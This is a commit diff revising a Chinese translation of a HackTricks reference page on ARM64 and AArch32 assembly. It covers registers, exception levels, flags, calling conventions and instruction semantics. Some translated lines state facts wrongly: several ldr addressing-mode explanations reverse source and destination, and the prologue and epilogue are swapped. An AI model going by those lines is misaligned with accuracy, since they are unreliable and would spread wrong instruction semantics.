Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

This commit is contained in:
Translator 2024-04-19 06:29:00 +00:00
parent 853a9ccddd
commit 34db73a166
2 changed files with 201 additions and 164 deletions

View file

@ -8,7 +8,7 @@
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
@ -16,7 +16,7 @@
## **异常级别 - ELARM64v8**
在ARMv8架构中执行级别称为异常级别ELs定义了执行环境的特权级别和功能。有四个异常级别从EL0到EL3每个都有不同的用途
在ARMv8架构中执行级别称为异常级别ELs定义了执行环境的特权级别和功能。有四个异常级别从EL0到EL3每个都有不同的目的
1. **EL0 - 用户模式**
* 这是最低特权级别,用于执行常规应用程序代码。
@ -26,54 +26,54 @@
* EL1比EL0具有更多特权并且可以访问系统资源但受一些限制以确保系统完整性。
3. **EL2 - 虚拟化模式**
* 此级别用于虚拟化。在EL2上运行的虚拟机监视程序可以管理在同一物理硬件上运行的多个操作系统每个操作系统在其自己的EL1中
* EL2提供了隔离和控制虚拟化环境的功能。
* EL2提供了用于隔离和控制虚拟化环境的功能。
4. **EL3 - 安全监视器模式**
* 这是最高特权级别,通常用于安全引导和受信任的执行环境。
* EL3可以管理和控制安全和非安全状态之间的访问例如安全引导,受信任的操作系统等)。
* 这是最高特权级别,通常用于安全引导和可信执行环境。
* EL3可以管理和控制安全和非安全状态之间的访问例如安全引导、可信操作系统等)。
使用这些级别可以以结构化和安全的方式管理系统的不同方面,从用户应用程序到最高特权系统软件。ARMv8对特权级别的处理有助于有效隔离不同系统组件,从而增强系统的安全性和稳健性。
使用这些级别可以以结构化和安全的方式管理系统的不同方面从用户应用程序到最高特权系统软件。ARMv8对特权级别的处理有助于有效隔离不同系统组件从而增强系统的安全性和稳健性。
## **寄存器ARM64v8**
ARM64有**31个通用寄存器**,标记为`x0`到`x30`。每个寄存器可以存储**64位**8字节值。对于需要仅使用32位值的操作可以使用相同的寄存器以32位模式访问名称为w0到w30。
ARM64有**31个通用寄存器**,标记为`x0`到`x30`。每个寄存器可以存储**64位**8字节值。对于需要仅使用32位值的操作可以使用相同的寄存器以32位模式访问名称为w0到w30。
1. **`x0`**到**`x7`** - 这些通常用作临时寄存器和用于向子例程传递参数。
* **`x0`**还携带函数的返回数据
2. **`x8`** - 在Linux内核中`x8`用作`svc`指令的系统调用号。**在macOS中使用的是x16**
3. **`x9`**到**`x15`** - 更多临时寄存器,通常用于局部变量。
4. **`x16`**和**`x17`** - **函数内调用寄存器**。用于立即值的临时寄存器。它们还用于间接函数调用和PLT过程链接表存根。
* **`x16`**在**macOS**中用作**`svc`**指令的**系统调用号**。
5. **`x18`** - **平台寄存器**。它可以用作通用寄存器但在某些平台上此寄存器保留用于特定平台用途在Windows中用作指向当前线程环境块的指针在Linux内核中用作指向当前**执行任务结构**的指针
6. **`x19`**到**`x28`** - 这些是被调用者保存的寄存器。函数必须保留这些寄存器的值供调用者使用,因此它们存储在堆栈中,并在返回给调用者之前恢复。
7. **`x29`** - **帧指针**用于跟踪堆栈帧。当由于调用函数而创建新的堆栈帧时,**`x29`**寄存器被**存储在堆栈中**,并且新的帧指针地址(**`sp`**地址)被**存储在此寄存器中**。
* 此寄存器也可以用作**通用寄存器**,尽管通常用作**局部变量的引用**。
8. **`x30`**或**`lr`**- **链接寄存器**。在执行`BL`(带链接的分支)或`BLR`(带链接到寄存器的分支)指令时,通过将**`pc`**值存储在此寄存器中来保存**返回地址**。
1. **`x0`** **`x7`** - 这些通常用作临时寄存器和用于向子例程传递参数。
* **`x0`** 还携带函数的返回数据
2. **`x8`** - 在Linux内核中`x8`用作`svc`指令的系统调用号。**在macOS中使用x16**
3. **`x9`** **`x15`** - 更多临时寄存器,通常用于局部变量。
4. **`x16`****`x17`** - **过程内调用寄存器**。用于立即值的临时寄存器。它们还用于间接函数调用和PLT过程链接表存根。
* **`x16`** 在**macOS**中用作**`svc`**指令的**系统调用号**。
5. **`x18`** - **平台寄存器**。它可以用作通用寄存器,但在某些平台上,此寄存器保留用于特定平台用途在Windows中用作指向当前线程环境块的指针在Linux内核中用于指向当前**执行任务结构**
6. **`x19`** **`x28`** - 这些是被调用者保存的寄存器。函数必须保留这些寄存器的值供调用者使用,因此它们存储在堆栈中,并在返回给调用者之前恢复。
7. **`x29`** - **帧指针** 用于跟踪堆栈帧。当由于调用函数而创建新的堆栈帧时,**`x29`**寄存器被**存储在堆栈中**,并且新的帧指针地址(**`sp`**地址)被**存储在此寄存器中**。
* 尽管通常用作**局部变量的引用**,但此寄存器也可以用作**通用寄存器**。
8. **`x30`** **`lr`**- **链接寄存器**。在执行`BL`(带链接的分支)或`BLR`(带链接到寄存器的分支)指令时,通过将**`pc`**值存储在此寄存器中来保存**返回地址**。
* 它也可以像其他寄存器一样使用。
* 如果当前函数将调用新函数,因此覆盖`lr`,它将在堆栈中存储它在开始时,这是尾声(`stp x29, x30 , [sp, #-48]; mov x29, sp` -> 存储`fp`和`lr`,生成空间并获取新的`fp`),并在结束时恢复它,这是序言(`ldp x29, x30, [sp], #48; ret` -> 恢复`fp`和`lr`并返回)。
* 如果当前函数将调用新函数,因此覆盖`lr`,它将在堆栈顶部存储它,这是尾声(`stp x29, x30 , [sp, #-48]; mov x29, sp` -> 存储`fp`和`lr`,生成空间并获取新的`fp`),并在最后恢复它,这是序言(`ldp x29, x30, [sp], #48; ret` -> 恢复`fp`和`lr`并返回)。
9. **`sp`** - **堆栈指针**,用于跟踪堆栈顶部。
* **`sp`**值应始终保持至少**四字对齐**,否则可能会发生对齐异常。
10. **`pc`** - **程序计数器**,指向下一条指令。此寄存器只能通过异常生成、异常返回和分支更新。可以读取此寄存器的唯一普通指令是带链接的分支指令BL、BLR以将**`pc`**地址存储在**`lr`**(链接寄存器)中。
11. **`xzr`** - **零寄存器**。在其**32**位寄存器形式中也称为**`wzr`**。可用于轻松获取零值(常见操作)或使用**`subs`**执行比较,例如**`subs XZR, Xn, #10`**将结果数据存储在任何地方(在**`xzr`**中)。
* **`sp`**值应始终保持至少**四字对齐**,否则可能会发生对齐异常。
10. **`pc`** - **程序计数器**,指向下一条指令。此寄存器只能通过异常生成、异常返回和分支更新。唯一可以读取此寄存器的普通指令是带链接的分支指令BL、BLR以将**`pc`**地址存储在**`lr`**(链接寄存器)中。
11. **`xzr`** - **零寄存器**。在其**32**位寄存器形式中也称为**`wzr`**。可用于轻松获取零值(常见操作)或使用**`subs`**执行比较,例如**`subs XZR, Xn, #10`**将结果数据存储在任何地方(在**`xzr`**中)。
**`Wn`**寄存器是**`Xn`**寄存器的**32位**版本。
### SIMD和浮点寄存器
此外,还有另外**32个长度为128位的寄存器**可用于优化的单指令多数据SIMD操作和执行浮点运算。这些称为Vn寄存器尽管它们也可以以**64**位、**32**位、**16**位和**8**位运行,然后称为**`Qn`**、**`Dn`**、**`Sn`**、**`Hn`**和**`Bn`**。
此外,还有另外**32个长度为128位的寄存器**可用于优化的单指令多数据SIMD操作和执行浮点运算。这些称为Vn寄存器尽管它们也可以在**64**位、**32**位、**16**位和**8**位上操作,然后称为**`Qn`**、**`Dn`**、**`Sn`**、**`Hn`**和**`Bn`**。
### 系统寄存器
**有数百个系统寄存器**也称为特殊目的寄存器SPR用于**监视**和**控制** **处理器**的行为。\
它们只能使用专用特殊指令**`mrs`**和**`msr`**来读取或设置。
**有数百个系统寄存器**也称为特殊目的寄存器SPRs),用于**监视**和**控制** **处理器**的行为。\
它们只能使用专用特殊指令**`mrs`**和**`msr`**来读取或设置。
特殊寄存器**`TPIDR_EL0`**和**`TPIDDR_EL0`**在逆向工程中经常被发现。`EL0`后缀表示可以从中访问寄存器的**最小异常**在这种情况下EL0是常规程序运行的异常特权级别。\
它们通常用于存储内存中**线程本地存储**区域的基址。通常第一个对于在EL0中运行的程序是可读写的但第二个可以从EL0中读取并从EL1如内核中写入。
特殊寄存器**`TPIDR_EL0`**和**`TPIDDR_EL0`**在逆向工程中经常被发现。`EL0`后缀表示可以访问寄存器的**最小异常**在这种情况下EL0是常规程序运行的异常特权级别。\
它们通常用于存储内存中**线程本地存储**区域的基址。通常第一个对于在EL0中运行的程序是可读写的但第二个可以从EL0中读取并从EL1如内核中写入。
* `mrs x0, TPIDR_EL0 ; 将 TPIDR_EL0 读入 x0`
* `msr TPIDR_EL0, X0 ; 将 x0 写入 TPIDR_EL0`
### **PSTATE**
**PSTATE** 包含几个进程组件序列化到操作系统可见的**`SPSR_ELx`**特殊寄存器中,其中 X 是**触发的**异常的**权限** **级别**(这允许在异常结束时恢复进程状态)。\
**PSTATE** 包含几个进程组件序列化到操作系统可见的**`SPSR_ELx`**特殊寄存器中,其中 X 是触发的异常的**权限** **级别(这允许在异常结束时恢复进程状态)。\
这些是可访问的字段:
<figure><img src="../../../.gitbook/assets/image (1193).png" alt=""><figcaption></figcaption></figure>
@ -85,26 +85,26 @@ ARM64有**31个通用寄存器**,标记为`x0`到`x30`。每个寄存器可以
* **`V`** 表示操作产生了有符号溢出:
* 两个正数的和产生负结果。
* 两个负数的和产生正结果。
* 在减法中,当从较小的正数中减去较大的负数(或反之亦然),并且结果无法在给定位大小的范围内表示时。
* 显然,处理器不知道操作是有符号还是无符号的,因此它将在操作中检查 C 和 V并指示是否发生了进位。
* 在减法中,当从较小的正数(或反之)中减去一个较大的负数,并且结果无法在给定位大小的范围内表示时。
* 显然,处理器不知道操作是有符号还是无符号的,因此它将在操作中检查 C 和 V并指示是否发生了进位。
{% hint style="warning" %}
并非所有指令都会更新这些标志。一些像**`CMP`**或**`TST`**这样的指令会更新,而像**`ADDS`**这样带有 s 后缀的其他指令也会更新。
{% endhint%}
并非所有指令都会更新这些标志。一些像**`CMP`**或**`TST`**的指令会更新,而像**`ADDS`**这样带有 s 后缀的指令也会更新。
{% endhint %}
* 当前的**寄存器宽度`nRW`**标志:如果标志的值为 0则程序在恢复后将在 AArch64 执行状态下运行。
* 当前的**寄存器宽度 (`nRW`) 标志**:如果标志的值为 0则程序在恢复后将在 AArch64 执行状态下运行。
* 当前的**异常级别****`EL`**):在 EL0 中运行的常规程序将具有值 0
* **单步执行**标志(**`SS`**):调试器使用此标志进行单步执行,通过在**`SPSR_ELx`**中将 SS 标志设置为 1来进行单步执行。程序将运行一步并发出单步执行异常。
* **单步执行**标志(**`SS`**):调试器使用此标志进行单步执行,通过异常将 SS 标志设置为 1。程序将运行一步并发出单步执行异常。
* **非法异常**状态标志(**`IL`**):用于标记特权软件执行无效的异常级别转移时,此标志设置为 1处理器触发非法状态异常。
* **`DAIF`** 标志:这些标志允许特权程序有选择地屏蔽某些外部异常。
* 如果 **`A`** 为 1触发**异步中止**。**`I`** 配置为响应外部硬件**中断请求**IRQs。而 F 与**快速中断请求**FIRs有关。
* **堆栈指针选择**标志(**`SPS`**):在 EL1 及以上运行的特权程序可以在使用自己的堆栈指针寄存器和用户模型之间进行切换(例如,在 `SP_EL1``EL0` 之间)。通过写入**`SPSel`**特殊寄存器来执行此切换。无法从 EL0 中执行此操作。
* 如果 **`A`** 为 1触发**异步中止**。**`I`** 配置为响应外部硬件**中断请求**IRQs。而 F 与**快速中断请求**FIRs有关。
* **堆栈指针选择**标志(**`SPS`**):在 EL1 及以上运行的特权程序可以在使用自己的堆栈指针寄存器和用户模型之间进行切换(例如,在 `SP_EL1``EL0` 之间)。这种切换是通过写入**`SPSel`**特殊寄存器来执行的。无法从 EL0 中执行此操作。
## **调用约定ARM64v8**
ARM64 调用约定指定函数的**前八个参数**通过寄存器**`x0` 到 `x7`**传递。**额外**参数通过**堆栈**传递。**返回**值通过寄存器**`x0`**传回,如果其长度为 128 位,则也可以传回到**`x1`**。必须在函数调用之间保留**`x19`**到**`x30`**和**`sp`**寄存器。
ARM64 调用约定指定函数的**前八个参数**通过寄存器**`x0` 到 `x7`**传递。**额外**参数通过**堆栈**传递。**返回**值通过寄存器**`x0`**传回,如果其长度为 128 位,则也可以在**`x1`**中传回。必须在函数调用之间保留**`x19`**到**`x30`**和**`sp`**寄存器。
在汇编中阅读函数时,查找**函数序言和尾声**。**序言**通常涉及**保存帧指针(`x29`****设置**新的**帧指针****分配堆栈空间**。**尾声**通常涉及**恢复保存的帧指针**和**从函数返回**。
在汇编中阅读函数时,查找**函数序言和尾声**。**序言**通常涉及**保存帧指针(`x29`****设置**新的**帧指针**,以及**分配堆栈空间**。**尾声**通常涉及**恢复保存的帧指针**和**从函数返回**。
### Swift 中的调用约定
@ -117,17 +117,17 @@ ARM64 指令通常具有**格式 `opcode dst, src1, src2`**,其中**`opcode`**
* **`mov`**:将一个值从一个**寄存器**移动到另一个寄存器。
* 示例:`mov x0, x1` — 这将从 `x1` 移动的值到 `x0`
* **`ldr`**:将**内存**中的值加载到**寄存器**中。
* 示例:`ldr x0, [x1]` — 这将从 `x1` 指向的内存位置加载一个值到 `x0`
* 示例:`ldr x0, [x1]` — 这将从 `x1` 指向的内存位置加载值到 `x0`
* **偏移模式**:指示影响原始指针的偏移量,例如:
* `ldr x2, [x1, #8]`,这将在 x2 中加载 x1 + 8 的值
* `ldr x2, [x0, x1, lsl #2]`,这将在 x2 中加载数组 x0 中位置 x1索引\* 4 处的对象
* `ldr x2, [x1, #8]`,这将在 x1 + 8 中加载 x2 的值
* `ldr x2, [x0, x1, lsl #2]`,这将在数组 x0 中的位置 x1索引\* 4 中加载 x2 的对象
* **预索引模式**:这将对原始进行计算,获取结果并将新原始存储在原始中。
* `ldr x2, [x1, #8]!`,这将在 `x2` 中加载 `x1 + 8`并将 `x1 + 8` 的结果存储在 `x1`
* `str lr, [sp, #-4]!`,将链接寄存器存储在 sp 中并更新寄存器 sp
* **后索引模式**:与前一个模式类似,但是首先访问内存地址,然后计算并存储偏移量。
* `ldr x0, [x1], #8`,加载 `x1``x0`,并将 `x1` 更新`x1 + 8`
* `ldr x2, [x1, #8]!`,这将在 `x1 + 8` 中加载 `x2` 并将 `x1 + 8` 的结果存储在 `x1`
* `str lr, [sp, #-4]!`,将链接寄存器存储在 sp 中并更新寄存器 sp
* **后索引模式**:与前一个类似,但是首先访问内存地址,然后计算并存储偏移量。
* `ldr x0, [x1], #8`,加载 `x1``x0` 并更新 `x1` `x1 + 8`
* **相对于 PC 的寻址**:在这种情况下,相对于 PC 寄存器计算要加载的地址
* `ldr x1, =_start`,这将加载 `_start` 符号开始的地址到 x1与当前 PC 相关。
* `ldr x1, =_start`,这将加载 `_start` 符号开始的地址与当前 PC 相关的 x1 中
* **`str`**:将**寄存器**中的值存储到**内存**中。
* 示例:`str x0, [x1]` — 这将 `x0` 中的值存储到 `x1` 指向的内存位置。
* **`ldp`****加载一对寄存器**。此指令从**连续内存**位置加载两个寄存器。内存地址通常是通过将偏移量添加到另一个寄存器中形成的。
@ -142,7 +142,7 @@ ARM64 指令通常具有**格式 `opcode dst, src1, src2`**,其中**`opcode`**
* Xn3 | #imm -> 操作数2寄存器或立即数
* \[shift #N | RRX\] -> 执行移位或调用RRX
* 示例:`add x0, x1, x2` — 这将把`x1`和`x2`的值相加,并将结果存储在`x0`中。
* `add x5, x5, #1, lsl #12` — 这等于40961左移12 -> 1 0000 0000 0000 0000
* `add x5, x5, #1, lsl #12` — 这等于40961左移12 -> 1 0000 0000 0000 0000
* **`adds`** 这执行一个`add`并更新标志位
* **`sub`**:从两个寄存器中减去值并将结果存储在一个寄存器中。
* 检查**`add`**的**语法**。
@ -165,52 +165,52 @@ ARM64 指令通常具有**格式 `opcode dst, src1, src2`**,其中**`opcode`**
* **位字段提取和插入**:从一个寄存器中复制位字段并将其复制到另一个寄存器中。
* **`BFI X1, X2, #3, #4`** 从X2的第3位插入4位到X1
* **`BFXIL X1, X2, #3, #4`** 从X2的第3位提取四位并将其复制到X1
* **`SBFIZ X1, X2, #3, #4`** 从X2中扩展4位并从第3位开始将其插入X1将右侧位清零
* **`SBFIZ X1, X2, #3, #4`** 从X2中扩展4位并从第3位开始插入X1将右侧位清零
* **`SBFX X1, X2, #3, #4`** 从X2的第3位开始提取4位进行符号扩展并将结果放入X1
* **`UBFIZ X1, X2, #3, #4`** 从X2中扩展4位并从第3位开始将其插入X1将右侧位清零
* **`UBFIZ X1, X2, #3, #4`** 从X2中扩展4位并从第3位开始插入X1将右侧位清零
* **`UBFX X1, X2, #3, #4`** 从X2的第3位开始提取4位并将零扩展的结果放入X1。
* **符号扩展至X**扩展值的符号或在无符号版本中仅添加0以便对其进行操作
* **`SXTB X1, W2`** 从W2扩展一个字节的符号到X1`W2`是`X2`的一半以填充64位
* **`SXTH X1, W2`** 从W2扩展一个16位数的符号到X1以填充64位
* **`SXTW X1, W2`** 从W2扩展一个字节的符号到X1以填充64位
* **`UXTB X1, W2`** 添加0无符号到W2的一个字节到X1以填充64位
* **`extr`**:从连接的指定**一对寄存器中提取位**
* **`extr`**:从指定**连接的一对寄存器**中提取位。
* 示例:`EXTR W3, W2, W1, #3` 这将**连接W1+W2**并从W2的第3位到W1的第3位获取并将其存储在W3中。
* **`cmp`**:比较两个寄存器并设置条件标志。它是`subs`的别名,将目标寄存器设置为零寄存器。用于判断`m == n`。
* 支持与`subs`相同的语法
* 示例:`cmp x0, x1` — 这比较`x0`和`x1`的值,并相应地设置条件标志。
* 支持与`subs`相同的语法
* 示例:`cmp x0, x1` — 这比较`x0`和`x1`的值,并相应地设置条件标志。
* **`cmn`****比较负数**操作数。在这种情况下,它是`adds`的别名并支持相同的语法。用于判断`m == -n`。
* **`ccmp`**条件比较仅在先前的比较为真时执行比较并明确设置nzcv位。
* `cmp x1, x2; ccmp x3, x4, 0, NE; blt _func` -> 如果x1 != x2且x3 < x4则跳转到func
* 这是因为**`ccmp`**仅在**先前的`cmp`为`NE`时执行**,如果不是,则位`nzcv`将设置为0不满足`blt`比较)。
* 这也可以用作`ccmn`(相同但是负数,类似于`cmp`与`cmn`)。
* **`tst`**检查比较的值是否都为1类似于ANDS但不会在任何地方存储结果。用于检查一个寄存器与一个值并检查值中指的寄存器的任何位是否为1。
* 示例:`tst X1, #7` 检查X1的最后3位中是否有任何位为1
* **`teq`**异或操作,丢弃结果
* 这也可以用作`ccmn`与`cmp`相同但是负数,类似于`cmp`与`cmn`)。
* **`tst`**检查比较的值是否都为1类似于ANDS但不会在任何地方存储结果)。用于检查一个寄存器与一个值,并检查值中指的寄存器的任何位是否为1。
* 示例:`tst X1, #7` 检查X1的最后3位中是否有任何位为1
* **`teq`**执行异或操作并丢弃结果
* **`b`**:无条件跳转
* 示例:`b myFunction`&#x20;
* 请注意,这不会将链接寄存器填充为返回地址(不适用于需要返回的子程序调用)
* **`bl`**:带链接的分支,用于**调用**子程序。将返回地址存储在`x30`中。
* 示例:`bl myFunction` — 这将调用函数`myFunction`并将返回地址存储在`x30`中。
* 请注意,这不会将链接寄存器填充为返回地址(不适用于需要返回的子程序调用)
* **`blr`**:带链接到寄存器的分支,用于**调用**寄存器中指定的**子程序**。将返回地址存储在`x30`中。(这是&#x20;
* **`blr`**:带链接到寄存器的分支,用于调用寄存器中指定的目标的子程序。将返回地址存储在`x30`中。(这是&#x20;
* 示例:`blr x1` — 这将调用地址包含在`x1`中的函数,并将返回地址存储在`x30`中。
* **`ret`**:从**子程序**返回,通常使用**`x30`**中的地址。
* **`ret`**:从子程序**返回**,通常使用**`x30`**中的地址。
* 示例:`ret` — 这将使用`x30`中的返回地址从当前子程序返回。
* **`b.<cond>`**:条件分支
* **`b.eq`****如果相等则跳转**,基于先前的`cmp`指令。
* 示例:`b.eq label` — 如果先前的`cmp`指令发现两个相等的值,则跳转到`label`。
* **`b.ne`**: **不相等时跳转**。该指令检查条件标志(由先前的比较指令设置),如果比较的值不相等,则跳转到一个标签或地址。
* 示例:`b.eq label` — 如果先前的`cmp`指令找到两个相等的值,则跳转到`label`。
* **`b.ne`**: **Branch if Not Equal**. 这个指令检查条件标志(由先前的比较指令设置),如果比较的值不相等,则跳转到一个标签或地址。
* 示例:在`cmp x0, x1`指令之后,`b.ne label` — 如果`x0`和`x1`中的值不相等,则跳转到`label`。
* **`cbz`**: **比较并在零时跳转**指令将一个寄存器与零进行比较,如果它们相等,则跳转到一个标签或地址。
* **`cbz`**: **比较并在零时跳转**这个指令将一个寄存器与零进行比较,如果它们相等,则跳转到一个标签或地址。
* 示例:`cbz x0, label` — 如果`x0`中的值为零,则跳转到`label`。
* **`cbnz`**: **比较并在非零时跳转**指令将一个寄存器与零进行比较,如果它们不相等,则跳转到一个标签或地址。
* **`cbnz`**: **比较并在非零时跳转**这个指令将一个寄存器与零进行比较,如果它们不相等,则跳转到一个标签或地址。
* 示例:`cbnz x0, label` — 如果`x0`中的值为非零,则跳转到`label`。
* **`tbnz`**: 测试位并在非零时跳转
* 示例:`tbnz x0, #8, label`
* **`tbz`**: 测试位并在零时跳转
* 示例:`tbz x0, #8, label`
* **条件选择操作**:这些是根据条件位变化行为的操作。
* **条件选择操作**:这些是根据条件位不同而行为不同的操作。
* `csel Xd, Xn, Xm, cond` -> `csel X0, X1, X2, EQ` -> 如果为真X0 = X1如果为假X0 = X2
* `csinc Xd, Xn, Xm, cond` -> 如果为真Xd = Xn如果为假Xd = Xm + 1
* `cinc Xd, Xn, cond` -> 如果为真Xd = Xn + 1如果为假Xd = Xn
@ -223,11 +223,11 @@ ARM64 指令通常具有**格式 `opcode dst, src1, src2`**,其中**`opcode`**
* **`adrp`**: 计算一个符号的**页地址**并将其存储在一个寄存器中。
* 示例:`adrp x0, symbol` — 这将计算`symbol`的页地址并将其存储在`x0`中。
* **`ldrsw`**: 从内存中**加载**一个带符号的**32位**值并将其**符号扩展为64位**。
* 示例:`ldrsw x0, [x1]` — 这将从`x1`指向的内存位置加载一个带符号的32位值将其符号扩展为64位并将其存储在`x0`中。
* 示例:`ldrsw x0, [x1]` — 这将从`x1`指向的内存位置加载一个带符号的32位值将其符号扩展为64位并将其存储在`x0`中。
* **`stur`**: 将寄存器值**存储到内存位置**,使用另一个寄存器的偏移量。
* 示例:`stur x0, [x1, #4]` — 这将把`x0`中的值存储到比`x1`当前地址大4个字节的内存地址中。
* **`svc`**:进行一个**系统调用**。它代表"Supervisor Call"。当处理器执行指令时,它会**从用户模式切换到内核模式**,并跳转到内存中内核系统调用处理代码的特定位置。
* 示例:
* **`svc`**:进行一个**系统调用**。它代表"Supervisor Call"。当处理器执行这个指令时,它会**从用户模式切换到内核模式**,并跳转到内存中内核系统调用处理代码所在的特定位置。
* 示例:
```armasm
mov x8, 93 ; 将退出的系统调用号93加载到寄存器x8中。
@ -238,17 +238,15 @@ svc 0 ; 进行系统调用。
### **函数序言**
1. **将链接寄存器和帧指针保存到堆栈中**
{% code overflow="wrap" %}
```armasm
stp x29, x30, [sp, #-16]! ; store pair x29 and x30 to the stack and decrement the stack pointer
```
{% endcode %}
2. **设置新的帧指针**`mov x29, sp`(为当前函数设置新的帧指针)
3. **为局部变量在栈上分配空间**(如果需要):`sub sp, sp, <size>`(其中 `<size>` 是所需字节数)
3. **为局部变量在栈上分配空间**(如果需要):`sub sp, sp, <size>`(其中 `<size>` 是所需字节数)
### **函数尾**
### **函数尾**
1. **释放局部变量(如果有分配的)**`add sp, sp, <size>`
2. **恢复链接寄存器和帧指针**
@ -264,13 +262,13 @@ ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment th
## AARCH32 执行状态
Armv8-A 支持执行 32 位程序。**AArch32** 可以在 **两种指令集**之一中运行:**`A32`** 和 **`T32`**,并可以通过 **`interworking`** 在它们之间切换。\
**特权**的 64 位程序可以通过执行例外级别转移到较低特权的 32 位程序来调度 **执行 32 位** 程序。\
请注意,从 64 位到 32 位的过渡发生在较低的例外级别例如EL1 中的 64 位程序触发 EL0 中的程序)。当 `AArch32` 进程线程准备好执行时,通过将 **`SPSR_ELx`** 特殊寄存器的 **第 4 位设置为 1** 来完成这一过渡,而 `SPSR_ELx` 的其余部分存储了 **`AArch32`** 程序的 CPSR。然后特权进程调用 **`ERET`** 指令,使处理器转换到 **`AArch32`** 进入 A32 或 T32,具体取决于 CPSR\*\*。\*\*
**特权**的 64 位程序可以通过执行将执行权转移给较低特权的 32 位程序的例外级别转移来调度 **执行 32 位** 程序。\
请注意,从 64 位到 32 位的过渡发生在较低的异常级别例如EL1 中的 64 位程序触发 EL0 中的程序)。这是通过在 `AArch32` 进程线程准备执行时将 **`SPSR_ELx`** 特殊寄存器的 **第 4 位设置为 1** 来完成的,而 `SPSR_ELx` 的其余部分存储了 **`AArch32`** 程序的 CPSR。然后特权进程调用 **`ERET`** 指令,使处理器转换到 **`AArch32`** 进入 A32 或 T32 取决于 CPSR\*\*。\*\*
**`interworking`** 使用 CPSR 的 J 和 T 位。`J=0` 和 `T=0` 表示 **`A32`**`J=0` 和 `T=1` 表示 **T32**。这基本上意味着将 **最低位设置为 1** 以指示指令集为 T32。\
这是在 **interworking 分支指令** 中设置的,但也可以直接使用其他指令设置,当 PC 被设置为目标寄存器时。例
这是在 **interworking 分支指令** 中设置的,但也可以直接使用其他指令设置,当 PC 被设置为目标寄存器时。例:
另一个例
另一个例:
```armasm
_start:
.code 32 ; Begin using A32
@ -283,20 +281,20 @@ mov r0, #8
```
### 寄存器
有16个32位寄存器r0-r15。**从r0到r14**可以用于**任何操作**,但其中一些通常被保留:
有16个32位寄存器r0-r15。**从r0到r14**它们可以用于**任何操作**,但其中一些通常被保留:
- **`r15`**程序计数器始终。包含下一条指令的地址。在A32中为当前地址 + 8在T32中为当前地址 + 4。
- **`r15`**程序计数器始终。包含下一条指令的地址。在A32中为当前 + 8在T32中为当前 + 4。
- **`r11`**:帧指针
- **`r12`**:函数内调用寄存器
- **`r13`**:堆栈指针
- **`r14`**:链接寄存器
此外,寄存器在**`banked registries`**中备份。这些地方存储寄存器的值,允许在异常处理和特权操作中执行**快速上下文切换**,避免每次都需要手动保存和恢复寄存器。\
这是通过将处理器状态从`CPSR`保存到所采取的处理器模式的`SPSR`中来完成的。在异常返回时,从`SPSR`中恢复`CPSR`
这是通过**将处理器状态从`CPSR`保存到所采取的处理器模式的`SPSR`**来完成的。在异常返回时,**从`SPSR`恢复`CPSR`**
### CPSR - 当前程序状态寄存器
在AArch32中CPSR的工作方式类似于AArch64中的`PSTATE`,当发生异常时也存储在`SPSR_ELx`中以便稍后恢复执行:
在AArch32中CPSR的工作方式类似于AArch64中的**`PSTATE`**,当发生异常时也存储在**`SPSR_ELx`**中以便稍后恢复执行:
<figure><img src="../../../.gitbook/assets/image (1194).png" alt=""><figcaption></figcaption></figure>
@ -307,24 +305,24 @@ mov r0, #8
#### 应用程序状态寄存器APSR
- **`N`****`Z`****`C`****`V`** 标志就像在AArch64中一样
- **`Q`** 标志:在执行专门的饱和算术指令时,当发生**整数饱和**时设置为1。一旦设置为**`1`**它将保持该值直到手动设置为0。此外没有任何隐式检查其值的指令必须手动读取它
- **`N`****`Z`****`C`****`V`**标志就像在AArch64中一样
- **`Q`**标志:在执行专门的饱和算术指令时,**整数饱和发生**时将其设置为1。一旦设置为**`1`**它将保持该值直到手动设置为0。此外没有任何隐式检查其值的指令必须通过手动读取来完成
- **`GE`**大于或等于标志用于SIMD单指令多数据操作例如“并行加法”和“并行减法”。这些操作允许在单个指令中处理多个数据点。
例如,**`UADD8`**指令**并行添加四对字节**来自两个32位操作数并将结果存储在32位寄存器中。然后基于这些结果在`APSR`中设置`GE`标志。每个GE标志对应于一个字节加法指示该字节对的加法是否**溢出**。
例如,**`UADD8`**指令**并行添加四对字节**来自两个32位操作数并将结果存储在32位寄存器中。然后基于这些结果它**在`APSR`中设置`GE`标志**。每个GE标志对应于一个字节加法指示该字节对的加法是否**溢出**。
**`SEL`**指令使用这些GE标志执行条件操作。
#### 执行状态寄存器
- **`J`** **`T`** 位:**`J`** 应为0如果 **`T`** 为0则使用A32指令集如果为1则使用T32指令集
- **IT块状态寄存器**`ITSTATE`这些是位10-15和25-26。它们存储`IT`前缀组内指令的条件。
- **`E`** 位:指示**字节序**。
- **模式和异常掩码位**0-4它们确定当前的执行状态。第**5**个指示程序是否以32位1或64位0运行。其他4个表示当前正在使用的**异常模式**(当发生异常并正在处理时)。设置的数字表示在处理此异常时触发另一个异常时的**当前优先级**。
- **`J`**和**`T`**位:**`J`**应为0如果**`T`**为0则使用指令集A32如果为1则使用T32。
- **IT块状态寄存器**`ITSTATE`这些是位10-15和25-26。它们存储**`IT`**前缀组内指令的条件。
- **`E`**位:指示**字节序**。
- **模式和异常掩码位**0-4它们确定当前的执行状态。第**5**个指示程序是否以32位1或64位0运行。其他4个表示**当前正在使用的异常模式**(当发生异常并正在处理时)。设置的数字表示在处理此异常时触发另一个异常时的**当前优先级**。
<figure><img src="../../../.gitbook/assets/image (1197).png" alt=""><figcaption></figcaption></figure>
- **`AIF`**:可以使用位**`A`**`I``F` 禁用某些异常。如果 **`A`** 为1则表示将触发**异步中止**。**`I`** 配置为响应外部硬件**中断请求**IRQs。F与**快速中断请求**FIRs有关。
